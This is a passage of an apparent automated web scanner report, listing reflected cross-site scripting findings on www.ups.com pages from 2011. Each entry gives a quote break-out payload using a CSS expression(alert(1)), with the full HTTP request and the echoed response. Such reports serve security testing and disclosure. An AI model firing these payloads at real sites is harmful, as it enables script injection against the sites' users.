<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us3a487"style="x:expression(alert(1))"0e616329edb/en/about/index.html">
...[SNIP]...

1.305. http://www.ups.com/content/us/en/about/index.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/about/index.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74567"style%3d"x%3aexpression(alert(1))"c1726c9caa7 was submitted in the REST URL parameter 3. This input was echoed as 74567"style="x:expression(alert(1))"c1726c9caa7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression in an injected style attribute to introduce arbitrary JavaScript into the document. Note that CSS expressions are specific to older versions and rendering modes of Internet Explorer, so this exact payload may not fire in other browsers; the underlying defect, an unencoded double quote that terminates the attribute value, is browser-independent.

Request

GET /content/us/en74567"style%3d"x%3aexpression(alert(1))"c1726c9caa7/about/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:40 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 46477


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/en74567"style="x:expression(alert(1))"c1726c9caa7/about/index.html">
...[SNIP]...

1.306. http://www.ups.com/content/us/en/about/news/service_updates/20091007_batteries.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/about/news/service_updates/20091007_batteries.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 73b92"style%3d"x%3aexpression(alert(1))"42a5a1abd9f was submitted in the REST URL parameter 2. This input was echoed as 73b92"style="x:expression(alert(1))"42a5a1abd9f in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. The payload uses a literal double quote to close the attribute value and then adds a style attribute whose CSS expression() is evaluated as JavaScript. Note that expression() is specific to Internet Explorer (it was dropped in IE8 standards mode) and will not work in other browsers; the attribute break-out itself does not depend on the browser.

Request

GET /content/us73b92"style%3d"x%3aexpression(alert(1))"42a5a1abd9f/en/about/news/service_updates/20091007_batteries.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:26 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 39118


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us73b92"style="x:expression(alert(1))"42a5a1abd9f/en/about/news/service_updates/20091007_batteries.html">
...[SNIP]...

1.307. http://www.ups.com/content/us/en/about/news/service_updates/20091007_batteries.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/about/news/service_updates/20091007_batteries.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9aa1f"style%3d"x%3aexpression(alert(1))"2fac5398be1 was submitted in the REST URL parameter 3. This input was echoed as 9aa1f"style="x:expression(alert(1))"2fac5398be1 in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. The payload uses a literal double quote to close the attribute value and then adds a style attribute whose CSS expression() is evaluated as JavaScript. Note that expression() is specific to Internet Explorer (it was dropped in IE8 standards mode) and will not work in other browsers; the attribute break-out itself does not depend on the browser.

Request

GET /content/us/en9aa1f"style%3d"x%3aexpression(alert(1))"2fac5398be1/about/news/service_updates/20091007_batteries.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:28 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 39118


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/en9aa1f"style="x:expression(alert(1))"2fac5398be1/about/news/service_updates/20091007_batteries.html">
...[SNIP]...

1.308. http://www.ups.com/content/us/en/about/news/service_updates/20100120_on_call.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/about/news/service_updates/20100120_on_call.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e708d"style%3d"x%3aexpression(alert(1))"1e47b8d55c1 was submitted in the REST URL parameter 2. This input was echoed as e708d"style="x:expression(alert(1))"1e47b8d55c1 in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. The payload uses a literal double quote to close the attribute value and then adds a style attribute whose CSS expression() is evaluated as JavaScript. Note that expression() is specific to Internet Explorer (it was dropped in IE8 standards mode) and will not work in other browsers; the attribute break-out itself does not depend on the browser.

Request

GET /content/use708d"style%3d"x%3aexpression(alert(1))"1e47b8d55c1/en/about/news/service_updates/20100120_on_call.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:27 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 35932


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/use708d"style="x:expression(alert(1))"1e47b8d55c1/en/about/news/service_updates/20100120_on_call.html">
...[SNIP]...

1.309. http://www.ups.com/content/us/en/about/news/service_updates/20100120_on_call.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/about/news/service_updates/20100120_on_call.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55c63"style%3d"x%3aexpression(alert(1))"76498229caa was submitted in the REST URL parameter 3. This input was echoed as 55c63"style="x:expression(alert(1))"76498229caa in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. The payload uses a literal double quote to close the attribute value and then adds a style attribute whose CSS expression() is evaluated as JavaScript. Note that expression() is specific to Internet Explorer (it was dropped in IE8 standards mode) and will not work in other browsers; the attribute break-out itself does not depend on the browser.

Request

GET /content/us/en55c63"style%3d"x%3aexpression(alert(1))"76498229caa/about/news/service_updates/20100120_on_call.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:30 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 35932


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/en55c63"style="x:expression(alert(1))"76498229caa/about/news/service_updates/20100120_on_call.html">
...[SNIP]...

1.310. http://www.ups.com/content/us/en/about/news/service_updates/20100624_fraud.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/about/news/service_updates/20100624_fraud.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aca67"style%3d"x%3aexpression(alert(1))"e8465dd6765 was submitted in the REST URL parameter 2. This input was echoed as aca67"style="x:expression(alert(1))"e8465dd6765 in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. The payload uses a literal double quote to close the attribute value and then adds a style attribute whose CSS expression() is evaluated as JavaScript. Note that expression() is specific to Internet Explorer (it was dropped in IE8 standards mode) and will not work in other browsers; the attribute break-out itself does not depend on the browser.

Request

GET /content/usaca67"style%3d"x%3aexpression(alert(1))"e8465dd6765/en/about/news/service_updates/20100624_fraud.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:29 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 36515


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/usaca67"style="x:expression(alert(1))"e8465dd6765/en/about/news/service_updates/20100624_fraud.html">
...[SNIP]...

1.311. http://www.ups.com/content/us/en/about/news/service_updates/20100624_fraud.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/about/news/service_updates/20100624_fraud.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e239"style%3d"x%3aexpression(alert(1))"aa66e09bfd8 was submitted in the REST URL parameter 3. This input was echoed as 1e239"style="x:expression(alert(1))"aa66e09bfd8 in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. The payload uses a literal double quote to close the attribute value and then adds a style attribute whose CSS expression() is evaluated as JavaScript. Note that expression() is specific to Internet Explorer (it was dropped in IE8 standards mode) and will not work in other browsers; the attribute break-out itself does not depend on the browser.

Request

GET /content/us/en1e239"style%3d"x%3aexpression(alert(1))"aa66e09bfd8/about/news/service_updates/20100624_fraud.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:35 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 36515


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/en1e239"style="x:expression(alert(1))"aa66e09bfd8/about/news/service_updates/20100624_fraud.html">
...[SNIP]...

1.312. http://www.ups.com/content/us/en/about/news/service_updates/20101102_investigation.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/about/news/service_updates/20101102_investigation.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68f09"style%3d"x%3aexpression(alert(1))"4a5c6425317 was submitted in the REST URL parameter 2. This input was echoed as 68f09"style="x:expression(alert(1))"4a5c6425317 in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. The payload uses a literal double quote to close the attribute value and then adds a style attribute whose CSS expression() is evaluated as JavaScript. Note that expression() is specific to Internet Explorer (it was dropped in IE8 standards mode) and will not work in other browsers; the attribute break-out itself does not depend on the browser.

Request

GET /content/us68f09"style%3d"x%3aexpression(alert(1))"4a5c6425317/en/about/news/service_updates/20101102_investigation.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:36 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 33854


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us68f09"style="x:expression(alert(1))"4a5c6425317/en/about/news/service_updates/20101102_investigation.html">
...[SNIP]...

1.313. http://www.ups.com/content/us/en/about/news/service_updates/20101102_investigation.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/about/news/service_updates/20101102_investigation.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96520"style%3d"x%3aexpression(alert(1))"18844fce5ae was submitted in the REST URL parameter 3. This input was echoed as 96520"style="x:expression(alert(1))"18844fce5ae in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. The payload uses a literal double quote to close the attribute value and then adds a style attribute whose CSS expression() is evaluated as JavaScript. Note that expression() is specific to Internet Explorer (it was dropped in IE8 standards mode) and will not work in other browsers; the attribute break-out itself does not depend on the browser.

Request

GET /content/us/en96520"style%3d"x%3aexpression(alert(1))"18844fce5ae/about/news/service_updates/20101102_investigation.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:39 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 33854


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/en96520"style="x:expression(alert(1))"18844fce5ae/about/news/service_updates/20101102_investigation.html">
...[SNIP]...

1.314. http://www.ups.com/content/us/en/about/news/service_updates/20101102_toner.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/about/news/service_updates/20101102_toner.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4eb22"style%3d"x%3aexpression(alert(1))"34b6ca681d4 was submitted in the REST URL parameter 2. This input was echoed as 4eb22"style="x:expression(alert(1))"34b6ca681d4 in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. The payload uses a literal double quote to close the attribute value and then adds a style attribute whose CSS expression() is evaluated as JavaScript. Note that expression() is specific to Internet Explorer (it was dropped in IE8 standards mode) and will not work in other browsers; the attribute break-out itself does not depend on the browser.

Request

GET /content/us4eb22"style%3d"x%3aexpression(alert(1))"34b6ca681d4/en/about/news/service_updates/20101102_toner.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:28 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 34171


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us4eb22"style="x:expression(alert(1))"34b6ca681d4/en/about/news/service_updates/20101102_toner.html">
...[SNIP]...

1.315. http://www.ups.com/content/us/en/about/news/service_updates/20101102_toner.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/about/news/service_updates/20101102_toner.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40e6f"style%3d"x%3aexpression(alert(1))"5407b987dea was submitted in the REST URL parameter 3. This input was echoed as 40e6f"style="x:expression(alert(1))"5407b987dea in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. The payload uses a literal double quote to close the attribute value and then adds a style attribute whose CSS expression() is evaluated as JavaScript. Note that expression() is specific to Internet Explorer (it was dropped in IE8 standards mode) and will not work in other browsers; the attribute break-out itself does not depend on the browser.

Request

GET /content/us/en40e6f"style%3d"x%3aexpression(alert(1))"5407b987dea/about/news/service_updates/20101102_toner.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:32 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 34171


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/en40e6f"style="x:expression(alert(1))"5407b987dea/about/news/service_updates/20101102_toner.html">
...[SNIP]...

1.316. http://www.ups.com/content/us/en/about/news/service_updates/20101217_imp_cntrl.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/about/news/service_updates/20101217_imp_cntrl.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 684d5"style%3d"x%3aexpression(alert(1))"735d7daa35a was submitted in the REST URL parameter 2. This input was echoed as 684d5"style="x:expression(alert(1))"735d7daa35a in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. The payload uses a literal double quote to close the attribute value and then adds a style attribute whose CSS expression() is evaluated as JavaScript. Note that expression() is specific to Internet Explorer (it was dropped in IE8 standards mode) and will not work in other browsers; the attribute break-out itself does not depend on the browser.

Request

GET /content/us684d5"style%3d"x%3aexpression(alert(1))"735d7daa35a/en/about/news/service_updates/20101217_imp_cntrl.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:31 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 34251


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us684d5"style="x:expression(alert(1))"735d7daa35a/en/about/news/service_updates/20101217_imp_cntrl.html">
...[SNIP]...

1.317. http://www.ups.com/content/us/en/about/news/service_updates/20101217_imp_cntrl.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/about/news/service_updates/20101217_imp_cntrl.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0bf3"style%3d"x%3aexpression(alert(1))"ea82c99023a was submitted in the REST URL parameter 3. This input was echoed as f0bf3"style="x:expression(alert(1))"ea82c99023a in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. The payload uses a literal double quote to close the attribute value and then adds a style attribute whose CSS expression() is evaluated as JavaScript. Note that expression() is specific to Internet Explorer (it was dropped in IE8 standards mode) and will not work in other browsers; the attribute break-out itself does not depend on the browser.

Request

GET /content/us/enf0bf3"style%3d"x%3aexpression(alert(1))"ea82c99023a/about/news/service_updates/20101217_imp_cntrl.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:36 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 34251


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/enf0bf3"style="x:expression(alert(1))"ea82c99023a/about/news/service_updates/20101217_imp_cntrl.html">
...[SNIP]...

1.318. http://www.ups.com/content/us/en/about/news/service_updates/retail_requirement.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/about/news/service_updates/retail_requirement.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34efe"style%3d"x%3aexpression(alert(1))"5e7fe6716d8 was submitted in the REST URL parameter 2. This input was echoed as 34efe"style="x:expression(alert(1))"5e7fe6716d8 in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. The payload uses a literal double quote to close the attribute value and then adds a style attribute whose CSS expression() is evaluated as JavaScript. Note that expression() is specific to Internet Explorer (it was dropped in IE8 standards mode) and will not work in other browsers; the attribute break-out itself does not depend on the browser.

Request

GET /content/us34efe"style%3d"x%3aexpression(alert(1))"5e7fe6716d8/en/about/news/service_updates/retail_requirement.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:30 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 34820


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us34efe"style="x:expression(alert(1))"5e7fe6716d8/en/about/news/service_updates/retail_requirement.html">
...[SNIP]...

1.319. http://www.ups.com/content/us/en/about/news/service_updates/retail_requirement.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/about/news/service_updates/retail_requirement.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 11694"style%3d"x%3aexpression(alert(1))"b9967f4690e was submitted in the REST URL parameter 3. This input was echoed as 11694"style="x:expression(alert(1))"b9967f4690e in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. The payload uses a literal double quote to close the attribute value and then adds a style attribute whose CSS expression() is evaluated as JavaScript. Note that expression() is specific to Internet Explorer (it was dropped in IE8 standards mode) and will not work in other browsers; the attribute break-out itself does not depend on the browser.

Request

GET /content/us/en11694"style%3d"x%3aexpression(alert(1))"b9967f4690e/about/news/service_updates/retail_requirement.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:32 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 34820


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/en11694"style="x:expression(alert(1))"b9967f4690e/about/news/service_updates/retail_requirement.html">
...[SNIP]...

1.320. http://www.ups.com/content/us/en/about/sites.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ups.com
Path:   /content/us/en/about/sites.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4ffa"style%3d"x%3aexpression(alert(1))"baeeaabbf7 was submitted in the REST URL parameter 2. This input was echoed as c4ffa"style="x:expression(alert(1))"baeeaabbf7 in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. The payload uses a literal double quote to close the attribute value and then adds a style attribute whose CSS expression() is evaluated as JavaScript. Note that expression() is specific to Internet Explorer (it was dropped in IE8 standards mode) and will not work in other browsers; the attribute break-out itself does not depend on the browser.

Request

